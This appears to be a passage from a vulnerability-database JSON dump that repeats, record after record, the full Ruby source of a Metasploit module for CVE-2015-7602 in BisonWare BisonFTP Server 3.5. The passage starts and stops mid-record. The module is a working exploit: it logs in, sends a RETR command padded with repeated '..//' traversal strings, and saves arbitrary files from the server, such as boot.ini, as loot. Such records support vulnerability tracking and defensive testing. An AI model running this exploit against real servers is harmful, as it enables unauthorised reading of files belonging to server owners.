end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T19:33:32", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T21:36:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T21:36:24", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T04:36:28", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T04:36:28", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-09T06:35:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-09T06:35:55", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T04:44:20", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T04:44:20", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-02-11T06:41:35", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-02-11T06:41:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-02-11T06:41:35", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "16708d46df6270c8caa416b93d03724c", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T01:04:59", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-03-22T01:04:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2019-03-22T01:04:59", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "191bc545a883cb2ca75e6977a6879512", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-03-22T03:07:29", "history": [], 